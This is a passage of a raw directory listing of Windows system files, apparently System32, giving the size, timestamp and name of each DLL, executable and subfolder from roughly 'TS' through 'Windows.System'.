00:53:45 TSpkg.dll +F 217600 09/15/2018 09:09:56 tspubwmi.dll +F 76800 09/15/2018 07:29:46 TSSessionUX.dll +F 170496 03/07/2020 00:54:25 tssrvlic.dll +F 53760 03/07/2020 00:54:16 TSTheme.exe +F 40448 09/15/2018 07:28:17 TsUsbGDCoInstaller.dll +F 13312 09/15/2018 07:28:22 TsUsbRedirectionGroupPolicyExtension.dll +F 68096 09/15/2018 07:29:23 TSWbPrxy.exe +F 1217024 03/07/2020 00:53:53 TSWorkspace.dll +F 196776 09/15/2018 07:28:34 ttdinject.exe +F 16536 09/15/2018 07:28:34 ttdloader.dll +F 67384 09/15/2018 07:28:36 ttdplm.dll +F 144288 09/15/2018 07:28:34 ttdrecord.dll +F 1563880 03/07/2020 00:53:41 ttdrecordcpu.dll +F 330672 03/07/2020 00:53:41 ttdwriter.dll +F 258560 09/15/2018 07:28:24 TtlsAuth.dll +F 220160 09/15/2018 07:28:24 TtlsCfg.dll +F 222208 09/15/2018 07:28:50 TtlsExt.dll +F 238904 09/15/2018 07:28:34 tttracer.exe +F 36352 09/15/2018 07:29:22 tvratings.dll +F 185344 03/07/2020 00:53:46 twext.dll +F 2149160 03/07/2020 00:53:24 twinapi.appcore.dll +F 620032 03/07/2020 00:53:53 twinapi.dll +F 765440 03/07/2020 00:53:38 twinui.appcore.dll +F 6942720 03/07/2020 00:53:53 twinui.dll +F 5575168 03/07/2020 00:53:47 twinui.pcshell.dll +F 117760 09/15/2018 07:28:42 txflog.dll +F 12800 09/15/2018 07:28:42 txfw32.dll +F 48128 09/15/2018 07:29:20 typeperf.exe +F 98304 09/15/2018 07:28:30 tzautoupdate.dll +F 2560 03/07/2020 00:53:26 tzres.dll +F 62464 09/15/2018 07:28:44 tzsync.exe +F 4096 09/15/2018 07:28:45 tzsyncres.dll +F 58368 09/15/2018 07:28:25 tzutil.exe +F 273408 03/07/2020 00:53:51 ubpm.dll +F 62464 09/15/2018 07:29:22 ucmhc.dll +F 1022824 03/07/2020 00:53:26 ucrtbase.dll +F 485192 03/07/2020 00:53:28 ucrtbase_enclave.dll +F 56848 09/15/2018 07:28:53 ucsvc.exe +F 68096 03/07/2020 00:54:08 udhisapi.dll +F 947200 03/07/2020 00:53:53 uDWM.dll +F 39936 09/15/2018 07:28:39 UefiCsp.dll +F 41472 09/15/2018 09:10:03 UevAgentPolicyGenerator.exe +F 55808 03/07/2020 00:53:30 UevAppMonitor.exe +F 146 09/15/2018 07:29:41 UevAppMonitor.exe.config +F 3420 09/15/2018 07:29:41 
UevCustomActionTypes.tlb +F 13824 09/15/2018 09:10:03 UevTemplateBaselineGenerator.exe +F 11776 09/15/2018 09:10:03 UevTemplateConfigItemGenerator.exe +F 115712 09/15/2018 07:28:38 uexfat.dll +F 153088 09/15/2018 07:28:38 ufat.dll +F 679424 03/07/2020 00:53:38 UiaManager.dll +F 273920 09/15/2018 07:28:30 UIAnimation.dll +F 2433024 03/07/2020 00:53:37 UIAutomationCore.dll +F 43520 09/15/2018 07:29:23 uicom.dll +F 13824 09/15/2018 07:28:44 UIManagerBrokerps.dll +F 36864 09/15/2018 07:28:44 UIMgrBroker.exe +F 282112 09/15/2018 07:28:44 uireng.dll +F 4035584 09/15/2018 07:29:46 UIRibbon.dll +F 835072 09/15/2018 07:29:46 UIRibbonRes.dll +D 0 03/07/2020 00:55:55 uk-UA +F 180024 09/15/2018 07:28:38 ulib.dll +F 61952 09/15/2018 07:28:44 umb.dll +F 19968 09/15/2018 07:29:23 umdmxfrm.dll +F 120832 09/15/2018 07:28:38 umpnpmgr.dll +F 62464 03/07/2020 00:53:31 umpo-overrides.dll +F 160768 03/07/2020 00:53:27 umpo.dll +F 108544 09/15/2018 07:28:56 umpoext.dll +F 88064 09/15/2018 07:29:20 umpowmi.dll +F 395264 09/15/2018 07:29:22 umrdp.dll +F 205624 09/15/2018 07:28:59 unattend.dll +F 78336 09/15/2018 07:28:51 unenrollhook.dll +F 296960 09/15/2018 07:29:22 unimdm.tsp +F 75776 09/15/2018 07:29:23 unimdmat.dll +F 22528 09/15/2018 07:29:22 uniplat.dll +F 1171968 03/07/2020 00:53:41 Unistore.dll +F 40960 09/15/2018 07:28:51 unlodctr.exe +D 0 03/07/2020 00:55:55 UNP +F 256000 09/15/2018 09:08:37 unregmp2.exe +F 562176 09/15/2018 07:28:38 untfs.dll +F 2767160 03/07/2020 00:53:29 UpdateAgent.dll +F 120832 03/07/2020 00:53:29 updatecsp.dll +F 779776 03/07/2020 00:53:29 updatehandlers.dll +F 197632 03/07/2020 00:53:29 updatepolicy.dll +F 118480 09/15/2018 07:28:34 upfc.exe +F 43008 03/07/2020 00:53:53 UpgradeResultsUI.exe +F 384000 09/15/2018 07:29:13 upnp.dll +F 40960 09/15/2018 07:29:13 upnpcont.exe +F 456192 03/07/2020 00:54:08 upnphost.dll +F 790328 03/07/2020 00:53:29 upshared.dll +F 801792 03/07/2020 00:53:50 uReFS.dll +F 572416 09/15/2018 07:28:42 uReFSv1.dll +F 30720 09/15/2018 
07:29:16 ureg.dll +F 236032 09/15/2018 07:29:16 url.dll +F 1862656 03/07/2020 00:53:57 urlmon.dll +F 40960 09/15/2018 07:28:38 UsbCApi.dll +F 123392 09/15/2018 07:28:29 usbceip.dll +F 336896 09/15/2018 07:28:56 usbmon.dll +F 14336 09/15/2018 07:28:29 usbperf.dll +F 45568 09/15/2018 07:28:38 UsbPmApi.dll +F 74752 09/15/2018 07:29:14 UsbSettingsHandlers.dll +F 54784 09/15/2018 07:28:20 UsbTask.dll +F 90112 09/15/2018 07:28:26 usbui.dll +F 1664904 03/07/2020 00:53:43 user32.dll +F 47192 09/15/2018 07:28:44 UserAccountBroker.exe +F 88576 09/15/2018 07:28:50 UserAccountControlSettings.dll +F 100352 03/07/2020 00:53:57 UserAccountControlSettings.exe +F 203776 03/07/2020 00:53:37 useractivitybroker.dll +F 1353728 09/15/2018 07:28:44 usercpl.dll +F 8192 09/15/2018 07:28:36 UserDataAccessRes.dll +F 447488 09/15/2018 07:28:34 UserDataAccountApis.dll +F 43520 09/15/2018 07:28:36 UserDataLanguageUtil.dll +F 61952 09/15/2018 07:28:36 UserDataPlatformHelperUtil.dll +F 1540608 09/15/2018 07:28:36 UserDataService.dll +F 121344 03/07/2020 00:53:41 UserDataTimeUtil.dll +F 46080 09/15/2018 07:28:36 UserDataTypeHelperUtil.dll +F 199168 09/15/2018 07:28:30 UserDeviceRegistration.dll +F 249856 09/15/2018 07:28:30 UserDeviceRegistration.Ngc.dll +F 152896 03/07/2020 00:53:26 userenv.dll +F 33792 09/15/2018 07:28:45 userinit.exe +F 19968 09/15/2018 07:28:50 userinitext.dll +F 60928 09/15/2018 07:28:36 UserLanguageProfileCallback.dll +F 1255936 03/07/2020 00:53:55 usermgr.dll +F 76944 09/15/2018 07:28:46 usermgrcli.dll +F 281600 09/15/2018 07:28:46 UserMgrProxy.dll +F 31232 09/15/2018 07:28:22 usk.rs +F 109056 03/07/2020 00:53:29 usoapi.dll +F 48128 03/07/2020 00:53:29 UsoClient.exe +F 902144 03/07/2020 00:53:29 usocore.dll +F 79360 03/07/2020 00:53:55 usp10.dll +F 50176 09/15/2018 07:28:44 ustprov.dll +F 103936 03/07/2020 00:53:29 utcutil.dll +F 45976 09/15/2018 07:28:45 utildll.dll +F 113664 09/15/2018 07:28:42 Utilman.exe +F 167936 09/15/2018 07:28:43 uudf.dll +F 145408 09/15/2018 
07:28:41 UvcModel.dll +F 109568 03/07/2020 00:54:22 uwfcfgmgmt.dll +F 144384 09/15/2018 09:10:04 uwfcsp.dll +F 30720 03/07/2020 00:54:22 uwfservicingapi.dll +F 89088 09/15/2018 07:28:44 UXInit.dll +F 176656 09/15/2018 07:28:58 uxlib.dll +F 11792 09/15/2018 07:28:58 uxlibres.dll +F 613376 03/07/2020 00:53:53 uxtheme.dll +F 418576 03/07/2020 00:53:31 vac.dll +F 547328 03/07/2020 00:54:17 VAN.dll +F 740352 09/15/2018 07:29:23 Vault.dll +F 152576 03/07/2020 00:53:37 VaultCDS.dll +F 296960 09/15/2018 07:28:36 vaultcli.dll +F 30208 09/15/2018 07:28:36 VaultCmd.exe +F 113152 09/15/2018 07:28:30 VaultRoaming.dll +F 359424 03/07/2020 00:53:40 vaultsvc.dll +F 167936 09/15/2018 07:29:23 VBICodec.ax +F 46080 09/15/2018 07:29:24 vbisurf.ax +F 136192 09/15/2018 07:29:16 vbsapi.dll +F 595968 03/07/2020 00:53:45 vbscript.dll +F 189952 09/15/2018 07:28:36 VCardParser.dll +F 391344 02/16/2017 16:45:12 vccorlib140.dll +F 87224 02/16/2017 16:45:12 vcruntime140.dll +F 640000 09/15/2018 07:28:44 vds.exe +F 239616 03/07/2020 00:53:52 vdsbas.dll +F 583168 09/15/2018 07:29:22 vdsdyn.dll +F 25600 09/15/2018 07:28:44 vdsldr.exe +F 130048 09/15/2018 07:28:44 vdsutil.dll +F 57344 09/15/2018 07:28:44 vdsvd.dll +F 109056 09/15/2018 07:28:44 vds_ps.dll +F 13824 09/15/2018 07:28:58 verclsid.exe +F 383184 09/15/2018 07:29:14 verifier.dll +F 160768 09/15/2018 07:28:36 verifier.exe +F 189440 09/15/2018 07:28:45 verifiergui.exe +F 30664 09/15/2018 07:28:58 version.dll +F 164504 03/07/2020 00:53:28 vertdll.dll +F 150528 03/07/2020 00:53:32 vfuprov.dll +F 68096 09/15/2018 07:29:22 vfwwdm32.dll +F 83472 03/07/2020 00:53:22 vid.dll +F 33792 09/15/2018 07:29:22 vidcap.ax +F 227840 03/07/2020 00:53:45 VideoHandlers.dll +F 111576 09/15/2018 09:10:01 VIDRESZR.DLL +F 65336 09/15/2018 07:28:39 virtdisk.dll +F 91720 01/10/2020 16:48:08 VMAgentDisabler.dll +F 26128 09/15/2018 07:29:24 VmApplicationHealthMonitorProxy.dll +F 28936 09/15/2018 07:28:19 vmbuspipe.dll +F 212992 09/15/2018 07:29:14 vmdevicehost.dll +F 
60216 09/15/2018 07:29:24 vmictimeprovider.dll +F 431616 09/15/2018 07:29:24 vmrdvcore.dll +F 131584 09/15/2018 07:28:22 VocabRoamingHandler.dll +F 44032 09/15/2018 07:28:39 VoiceActivationManager.dll +F 148480 09/15/2018 07:28:39 VoipRT.dll +F 684544 03/07/2020 00:53:45 vpnike.dll +F 54272 09/15/2018 07:28:57 vpnikeapi.dll +F 11264 09/15/2018 07:28:56 VpnSohDesktop.dll +F 238080 03/07/2020 00:53:40 VPNv2CSP.dll +F 20480 09/15/2018 07:29:46 VscMgrPS.dll +F 143872 09/15/2018 07:29:23 vssadmin.exe +F 1622016 03/07/2020 00:53:47 vssapi.dll +F 68608 09/15/2018 07:28:39 vsstrace.dll +F 1516544 03/07/2020 00:53:47 VSSVC.exe +F 61952 09/15/2018 07:28:39 vss_ps.dll +F 646656 03/07/2020 00:53:28 w32time.dll +F 248832 03/07/2020 00:53:28 w32tm.exe +F 35328 09/15/2018 07:28:29 w32topl.dll +F 113664 09/15/2018 07:28:36 WaaSAssessment.dll +F 88576 03/07/2020 00:53:29 WaaSMedicAgent.exe +F 257024 03/07/2020 00:53:29 WaaSMedicCapsule.dll +F 28672 09/15/2018 07:28:36 WaaSMedicPS.dll +F 357888 03/07/2020 00:53:29 WaaSMedicSvc.dll +F 72192 09/15/2018 07:29:14 WABSyncProvider.dll +F 39936 09/15/2018 07:29:23 waitfor.exe +F 12800 09/15/2018 07:28:36 WalletBackgroundServiceProxy.dll +F 104448 09/15/2018 07:28:36 WalletProxy.dll +F 431104 09/15/2018 07:29:46 WalletService.dll +F 22528 09/15/2018 07:28:59 WallpaperHost.exe +F 257536 09/15/2018 07:29:22 wavemsp.dll +F 321024 09/15/2018 07:29:46 wbadmin.exe +D 0 03/07/2020 10:38:32 wbem +F 490496 09/15/2018 07:28:25 wbemcomn.dll +F 1538560 03/07/2020 00:54:08 wbengine.exe +F 955392 03/07/2020 00:53:42 wbiosrvc.dll +F 50176 03/07/2020 00:53:26 wcimage.dll +F 139264 09/15/2018 07:28:25 wcmapi.dll +F 236032 09/15/2018 07:28:25 wcmcsp.dll +F 1021952 03/07/2020 00:53:34 wcmsvc.dll +D 0 09/15/2018 09:07:53 WCN +F 137216 09/15/2018 07:28:26 WcnApi.dll +F 475136 09/15/2018 07:28:26 wcncsvc.dll +F 38912 09/15/2018 07:28:26 WcnEapAuthProxy.dll +F 36864 09/15/2018 07:28:26 WcnEapPeerProxy.dll +F 48640 09/15/2018 07:28:25 WcnNetsh.dll +F 1315840 
09/15/2018 07:28:25 wcnwiz.dll +F 305664 03/07/2020 00:53:26 wc_storage.dll +F 1418240 09/15/2018 07:29:21 wdc.dll +D 0 03/29/2020 09:19:09 WDI +F 102400 09/15/2018 07:28:52 wdi.dll +F 218624 03/07/2020 00:53:53 wdigest.dll +F 254976 09/15/2018 07:28:20 wdmaud.drv +F 248120 09/15/2018 06:09:28 wdscore.dll +F 614 09/15/2018 07:28:44 WdsUnattendTemplate.xml +F 4608 09/15/2018 07:28:23 WEB.rs +F 399872 09/15/2018 07:28:34 webauthn.dll +F 10240 09/15/2018 07:28:42 WebCache.exe +F 968704 09/15/2018 09:09:56 WebcamUi.dll +F 262144 09/15/2018 07:29:16 webcheck.dll +F 219136 09/15/2018 07:29:25 WebClnt.dll +F 587776 09/15/2018 07:28:45 webio.dll +F 1309696 03/07/2020 00:54:14 webplatstorageserver.dll +F 2698752 03/07/2020 00:53:58 WebRuntimeManager.dll +F 1383680 09/15/2018 07:28:36 webservices.dll +F 47104 03/07/2020 00:53:26 Websocket.dll +F 77824 09/15/2018 07:29:18 wecapi.dll +F 197632 09/15/2018 07:29:18 wecsvc.dll +F 103936 09/15/2018 07:29:18 wecutil.exe +F 27648 09/15/2018 07:29:14 wephostsvc.dll +F 890400 03/07/2020 00:53:29 wer.dll +F 1292288 03/07/2020 00:54:15 werconcpl.dll +F 123392 03/07/2020 00:54:15 wercplsupport.dll +F 41984 03/07/2020 00:53:29 werdiagcontroller.dll +F 247856 09/15/2018 07:28:46 weretw.dll +F 510504 03/07/2020 00:53:29 WerFault.exe +F 163448 03/07/2020 00:53:29 WerFaultSecure.exe +F 213816 03/07/2020 00:53:29 wermgr.exe +F 215552 03/07/2020 00:53:29 wersvc.dll +F 496128 03/07/2020 00:54:11 werui.dll +F 407712 03/07/2020 00:53:28 wevtapi.dll +F 100352 09/15/2018 07:29:16 wevtfwd.dll +F 1893376 03/07/2020 00:53:28 wevtsvc.dll +F 258560 09/15/2018 07:28:38 wevtutil.exe +F 144384 09/15/2018 07:29:16 wextract.exe +F 115109 09/15/2018 07:28:51 WF.msc +F 24576 09/15/2018 07:28:34 wfapigp.dll +F 41472 09/15/2018 07:28:25 wfdprov.dll +F 76800 09/15/2018 07:28:24 WFDSConMgr.dll +F 715776 03/07/2020 00:53:32 WFDSConMgrSvc.dll +F 88576 09/15/2018 07:29:24 WfHC.dll +F 928768 09/15/2018 07:29:47 WFS.exe +F 669696 09/15/2018 07:29:47 WFSR.dll +F 40448 
09/15/2018 07:28:50 whealogr.dll +F 40960 09/15/2018 07:29:22 where.exe +F 16384 09/15/2018 07:28:56 whhelper.dll +F 71680 09/15/2018 07:29:24 whoami.exe +F 95744 09/15/2018 07:29:18 wiaacmgr.exe +F 673792 03/07/2020 00:54:12 wiaaut.dll +F 456192 09/15/2018 07:29:18 wiadefui.dll +F 145920 03/07/2020 00:54:12 wiadss.dll +F 11776 09/15/2018 07:29:18 WiaExtensionHost64.dll +F 83968 03/07/2020 00:54:12 wiarpc.dll +F 100864 09/15/2018 07:29:18 wiascanprofiles.dll +F 651776 03/07/2020 00:54:12 wiaservc.dll +F 462848 09/15/2018 07:29:18 wiashext.dll +F 18432 09/15/2018 07:29:16 wiatrace.dll +F 37888 09/15/2018 07:29:16 wiawow64.exe +F 263680 03/07/2020 00:53:32 WiFiCloudStore.dll +F 46592 09/15/2018 07:28:25 WiFiConfigSP.dll +F 136704 09/15/2018 07:28:26 wificonnapi.dll +F 392192 03/07/2020 00:53:33 WiFiDisplay.dll +F 1114112 03/07/2020 00:53:32 wifinetworkmanager.dll +F 403984 09/15/2018 07:28:26 wifitask.exe +F 2404 09/15/2018 07:28:42 WimBootCompress.ini +F 764216 03/07/2020 00:53:51 wimgapi.dll +F 519992 03/07/2020 00:53:50 wimserv.exe +F 71696 03/07/2020 00:53:51 win32appinventorycsp.dll +F 697856 09/15/2018 09:10:02 win32calc.exe +F 193536 03/07/2020 00:53:51 Win32CompatibilityAppraiserCSP.dll +F 543744 03/07/2020 00:53:43 win32k.sys +F 2418176 03/07/2020 00:53:39 win32kbase.sys +F 3636736 03/07/2020 00:53:43 win32kfull.sys +F 17920 09/15/2018 07:28:38 win32kns.sys +F 847872 03/07/2020 00:53:33 win32spl.dll +F 125704 09/15/2018 07:28:38 win32u.dll +F 27648 09/15/2018 07:28:24 Win32_DeviceGuard.dll +F 178688 03/07/2020 00:53:42 winbio.dll +D 0 03/30/2020 03:39:14 WinBioDatabase +F 389120 03/07/2020 00:53:51 WinBioDataModel.dll +F 60928 09/15/2018 07:29:46 WinBioDataModelOOBE.exe +F 41984 09/15/2018 07:29:14 winbioext.dll +D 0 03/07/2020 00:55:55 WinBioPlugIns +F 186464 03/07/2020 00:53:24 winbrand.dll +F 442880 09/15/2018 07:28:46 wincorlib.dll +F 44032 09/15/2018 07:29:14 wincredprovider.dll +F 201216 03/07/2020 00:53:57 wincredui.dll +F 1333248 03/07/2020 00:53:42 
WindowManagement.dll +F 1005568 03/07/2020 00:53:38 Windows.AccountsControl.dll +F 4866560 03/07/2020 00:53:38 Windows.AI.MachineLearning.dll +F 108032 09/15/2018 07:28:30 Windows.AI.MachineLearning.Preview.dll +F 118784 09/15/2018 07:28:26 Windows.ApplicationModel.Background.SystemEventsBroker.dll +F 30208 09/15/2018 07:28:26 Windows.ApplicationModel.Background.TimeBroker.dll +F 211968 09/15/2018 07:28:29 Windows.ApplicationModel.Core.dll +F 818640 03/07/2020 00:53:38 windows.applicationmodel.datatransfer.dll +F 904104 03/07/2020 00:53:24 Windows.ApplicationModel.dll +F 498688 03/07/2020 00:53:43 Windows.ApplicationModel.LockScreen.dll +F 2233688 03/07/2020 00:53:41 Windows.ApplicationModel.Store.dll +F 65024 09/15/2018 07:28:32 Windows.ApplicationModel.Store.Preview.DOSettings.dll +F 312832 03/07/2020 00:53:41 Windows.ApplicationModel.Store.TestingFramework.dll +F 567296 09/15/2018 07:28:34 Windows.ApplicationModel.Wallet.dll +F 2050560 03/07/2020 00:53:38 Windows.CloudStore.dll +F 148480 09/15/2018 07:28:59 Windows.CloudStore.Schema.DesktopShell.dll +F 1085952 03/07/2020 00:53:35 Windows.CloudStore.Schema.Shell.dll +F 505856 03/07/2020 00:53:45 Windows.Cortana.Desktop.dll +F 326144 03/07/2020 00:53:45 Windows.Cortana.OneCore.dll +F 144384 03/07/2020 00:53:57 Windows.Cortana.PAL.Desktop.dll +F 128000 09/15/2018 07:28:57 Windows.Cortana.ProxyStub.dll +F 494080 03/07/2020 00:53:50 Windows.Data.Activities.dll +F 7888896 03/07/2020 00:53:38 Windows.Data.Pdf.dll +F 628736 09/15/2018 07:28:30 Windows.Devices.AllJoyn.dll +F 86016 03/07/2020 00:53:37 Windows.Devices.Background.dll +F 20992 09/15/2018 07:28:30 Windows.Devices.Background.ps.dll +F 2233856 03/07/2020 00:53:37 Windows.Devices.Bluetooth.dll +F 96768 03/07/2020 00:53:37 Windows.Devices.Custom.dll +F 23552 09/15/2018 07:28:30 Windows.Devices.Custom.ps.dll +F 508720 03/07/2020 00:53:39 Windows.Devices.Enumeration.dll +F 189952 09/15/2018 07:28:30 Windows.Devices.Haptics.dll +F 280064 09/15/2018 07:28:30 
Windows.Devices.HumanInterfaceDevice.dll +F 378880 03/07/2020 00:53:42 Windows.Devices.Lights.dll +F 611840 03/07/2020 00:53:40 Windows.Devices.LowLevel.dll +F 431104 09/15/2018 07:28:22 Windows.Devices.Midi.dll +F 2357248 09/15/2018 07:28:38 Windows.Devices.Perception.dll +F 456704 03/07/2020 00:53:40 Windows.Devices.Picker.dll +F 1718272 09/15/2018 07:28:36 Windows.Devices.PointOfService.dll +F 52224 09/15/2018 07:28:29 Windows.Devices.Portable.dll +F 90112 09/15/2018 07:28:30 Windows.Devices.Printers.dll +F 44544 09/15/2018 07:28:55 Windows.Devices.Printers.Extensions.dll +F 220672 03/07/2020 00:53:37 Windows.Devices.Radios.dll +F 220672 09/15/2018 07:29:18 Windows.Devices.Scanners.dll +F 1287072 03/07/2020 00:53:43 Windows.Devices.Sensors.dll +F 149504 03/07/2020 00:53:37 Windows.Devices.SerialCommunication.dll +F 900096 09/15/2018 07:28:30 Windows.Devices.SmartCards.dll +F 594432 09/15/2018 07:28:34 Windows.Devices.SmartCards.Phone.dll +F 417280 09/15/2018 07:28:29 Windows.Devices.Usb.dll +F 289280 09/15/2018 07:28:30 Windows.Devices.WiFi.dll +F 501248 09/15/2018 07:28:24 Windows.Devices.WiFiDirect.dll +F 183808 09/15/2018 07:28:30 Windows.Energy.dll +F 807936 09/15/2018 07:28:30 Windows.Gaming.Input.dll +F 391680 03/07/2020 00:53:39 Windows.Gaming.Preview.dll +F 89600 09/15/2018 07:28:32 Windows.Gaming.UI.GameBar.dll +F 456192 09/15/2018 07:28:20 Windows.Gaming.XboxLive.Storage.dll +F 1533440 03/07/2020 00:53:37 Windows.Globalization.dll +F 64000 09/15/2018 07:28:30 Windows.Globalization.Fontgroups.dll +F 888320 09/15/2018 07:28:36 Windows.Globalization.PhoneNumberFormatting.dll +F 130872 03/07/2020 00:53:43 Windows.Graphics.Display.BrightnessOverride.dll +F 149240 03/07/2020 00:53:40 Windows.Graphics.Display.DisplayEnhancementOverride.dll +F 494080 03/07/2020 00:53:40 Windows.Graphics.dll +F 2276864 09/15/2018 07:28:30 Windows.Graphics.Printing.3D.dll +F 792576 09/15/2018 07:28:30 Windows.Graphics.Printing.dll +F 448000 03/07/2020 00:53:45 
Windows.Graphics.Printing.Workflow.dll +F 16896 09/15/2018 07:28:56 Windows.Graphics.Printing.Workflow.Native.dll +F 158208 09/15/2018 07:29:16 Windows.Help.Runtime.dll +F 701440 03/07/2020 00:53:43 windows.immersiveshell.serviceprovider.dll +F 135680 09/15/2018 07:28:41 Windows.Internal.AdaptiveCards.XamlCardRenderer.dll +F 628736 03/07/2020 00:53:37 Windows.Internal.Bluetooth.dll +F 231424 03/07/2020 00:53:49 Windows.Internal.CapturePicker.Desktop.dll +F 168448 03/07/2020 00:53:50 Windows.Internal.CapturePicker.dll +F 235008 03/07/2020 00:53:41 Windows.Internal.Devices.Sensors.dll +F 169984 09/15/2018 07:28:32 Windows.Internal.Graphics.Display.DisplayEnhancementManagement.dll +F 949248 03/07/2020 00:53:58 Windows.Internal.Management.dll +F 65536 09/15/2018 07:28:26 Windows.Internal.PlatformExtension.DevicePickerExperience.dll +F 54272 09/15/2018 07:29:14 Windows.Internal.PlatformExtension.MiracastBannerExperience.dll +F 506368 03/07/2020 00:54:17 Windows.Internal.PredictionUnit.dll +F 149504 03/07/2020 00:53:28 Windows.Internal.Security.Attestation.DeviceAttestation.dll +F 46592 09/15/2018 07:29:16 Windows.Internal.SecurityMitigationsBroker.dll +F 1162088 03/07/2020 00:53:57 Windows.Internal.Shell.Broker.dll +F 88576 03/07/2020 00:53:36 windows.internal.shellcommon.AccountsControlExperience.dll +F 61440 09/15/2018 07:28:29 windows.internal.shellcommon.AppResolverModal.dll +F 138624 03/07/2020 00:53:36 Windows.Internal.ShellCommon.Broker.dll +F 41472 09/15/2018 07:28:41 windows.internal.shellcommon.FilePickerExperienceMEM.dll +F 40960 09/15/2018 07:28:58 Windows.Internal.ShellCommon.PrintExperience.dll +F 327168 03/07/2020 00:53:36 windows.internal.shellcommon.shareexperience.dll +F 43008 09/15/2018 07:28:45 windows.internal.shellcommon.ShellPosition.dll +F 60416 09/15/2018 07:28:26 windows.internal.shellcommon.TokenBrokerModal.dll +F 848896 03/07/2020 00:53:32 Windows.Internal.Signals.dll +F 57344 09/15/2018 07:28:42 
Windows.Internal.UI.BioEnrollment.ProxyStub.dll +F 257024 09/15/2018 07:28:50 Windows.Internal.UI.Logon.ProxyStub.dll +F 33792 09/15/2018 07:28:25 Windows.Management.Provisioning.ProxyStub.dll +F 373248 03/07/2020 00:53:33 Windows.Management.Service.dll +F 239120 03/07/2020 00:53:39 Windows.Management.Workplace.dll +F 34304 09/15/2018 07:28:26 Windows.Management.Workplace.WorkplaceSettings.dll +F 1282048 09/15/2018 09:10:05 Windows.Media.Audio.dll +F 877056 03/07/2020 00:53:36 Windows.Media.BackgroundMediaPlayback.dll +F 13312 09/15/2018 07:28:26 Windows.Media.BackgroundPlayback.exe +F 403544 09/15/2018 07:28:20 Windows.Media.Devices.dll +F 7727336 03/07/2020 00:54:26 Windows.Media.dll +F 1383936 09/15/2018 09:10:02 Windows.Media.Editing.dll +F 1390592 09/15/2018 07:28:30 Windows.Media.FaceAnalysis.dll +F 821248 09/15/2018 07:28:29 Windows.Media.Import.dll +F 511040 09/15/2018 07:28:42 Windows.Media.MediaControl.dll +F 946688 09/15/2018 07:28:29 Windows.Media.Ocr.dll +F 874496 03/07/2020 00:53:36 Windows.Media.Playback.BackgroundMediaPlayer.dll +F 855040 03/07/2020 00:53:36 Windows.Media.Playback.MediaPlayer.dll +F 113152 09/15/2018 07:28:26 Windows.Media.Playback.ProxyStub.dll +F 7645392 03/07/2020 00:53:36 Windows.Media.Protection.PlayReady.dll +F 113664 09/15/2018 09:10:00 Windows.Media.Renewal.dll +F 1818624 03/07/2020 00:53:47 Windows.Media.Speech.dll +F 568832 09/15/2018 07:28:39 Windows.Media.Speech.UXRes.dll +F 1084416 03/07/2020 00:53:28 Windows.Media.Streaming.dll +F 218624 09/15/2018 09:09:59 Windows.Media.Streaming.ps.dll +F 3952760 03/07/2020 00:54:17 Windows.Mirage.dll +F 949760 03/07/2020 00:54:17 Windows.Mirage.Internal.dll +F 102912 09/15/2018 07:28:29 Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll +F 502784 09/15/2018 07:28:29 Windows.Networking.BackgroundTransfer.ContentPrefetchTask.dll +F 975360 09/15/2018 07:28:26 Windows.Networking.BackgroundTransfer.dll +F 745984 03/07/2020 00:53:34 Windows.Networking.Connectivity.dll +F 
940032 09/15/2018 07:28:29 Windows.Networking.dll +F 227840 09/15/2018 07:28:29 Windows.Networking.HostName.dll +F 354304 09/15/2018 07:28:36 Windows.Networking.NetworkOperators.ESim.dll +F 140288 03/07/2020 00:53:33 Windows.Networking.NetworkOperators.HotspotAuthentication.dll +F 348160 09/15/2018 07:28:30 Windows.Networking.Proximity.dll +F 115200 09/15/2018 07:28:32 Windows.Networking.ServiceDiscovery.Dnssd.dll +F 189440 03/07/2020 00:53:34 Windows.Networking.Sockets.PushEnabledApplication.dll +F 569344 09/15/2018 07:28:38 Windows.Networking.UX.EapRequestHandler.dll +F 1311232 03/07/2020 00:53:40 Windows.Networking.Vpn.dll +F 75776 09/15/2018 07:29:13 Windows.Networking.XboxLive.ProxyStub.dll +F 610304 09/15/2018 07:28:34 Windows.Payments.dll +F 987736 03/07/2020 00:53:37 Windows.Perception.Stub.dll +F 269312 09/15/2018 07:28:36 Windows.Security.Authentication.Identity.Provider.dll +F 890368 03/07/2020 00:53:36 Windows.Security.Authentication.OnlineId.dll +F 1038336 03/07/2020 00:53:37 Windows.Security.Authentication.Web.Core.dll +F 110040 09/15/2018 07:28:29 Windows.Security.Credentials.UI.CredentialPicker.dll +F 123904 09/15/2018 07:28:29 Windows.Security.Credentials.UI.UserConsentVerifier.dll +F 57144 09/15/2018 07:28:29 Windows.Security.Integrity.dll +F 1081656 03/07/2020 00:53:41 Windows.Services.TargetedContent.dll +F 223744 03/07/2020 00:53:49 Windows.SharedPC.AccountManager.dll +F 182784 03/07/2020 00:53:48 Windows.SharedPC.CredentialProvider.dll +F 340480 03/07/2020 00:53:49 Windows.Shell.BlueLightReduction.dll +F 59904 09/15/2018 07:28:57 Windows.Shell.Search.UriHandler.dll +F 96256 09/15/2018 07:28:34 Windows.Shell.ServiceHostBuilder.dll +F 22528 09/15/2018 07:28:30 Windows.Shell.StartLayoutPopulationEvents.dll +F 4997096 03/07/2020 00:53:25 Windows.StateRepository.dll +F 101176 03/07/2020 00:53:25 Windows.StateRepositoryBroker.dll +F 156984 03/07/2020 00:53:25 Windows.StateRepositoryClient.dll +F 41472 03/07/2020 00:53:25 
Windows.StateRepositoryCore.dll +F 1219424 03/07/2020 00:53:25 Windows.StateRepositoryPS.dll +F 195072 03/07/2020 00:53:25 Windows.StateRepositoryUpgrade.dll +F 351432 03/07/2020 00:53:38 Windows.Storage.ApplicationData.dll +F 179200 09/15/2018 07:28:30 Windows.Storage.Compression.dll +F 7700480 03/07/2020 00:53:25 windows.storage.dll +F 224768 03/07/2020 00:53:25 Windows.Storage.OneCore.dll +F 723456 03/07/2020 00:53:37 Windows.Storage.Search.dll +F 371200 03/07/2020 00:53:41 Windows.System.Diagnostics.dll +F 56320 09/15/2018 07:28:30 Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll +F 107008 09/15/2018 07:28:30 Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll +F 681984 03/07/2020 00:53:37 Windows.System.Launcher.dll +F 221184 09/15/2018 07:29:21 Windows.System.Profile.HardwareId.dll +F 71168 03/07/2020 00:53:37 Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll +F 135680 09/15/2018 07:28:36 Windows.System.Profile.RetailInfo.dll +F 60416 09/15/2018 07:28:34 Windows.System.Profile.SystemId.dll +F 51200 03/07/2020 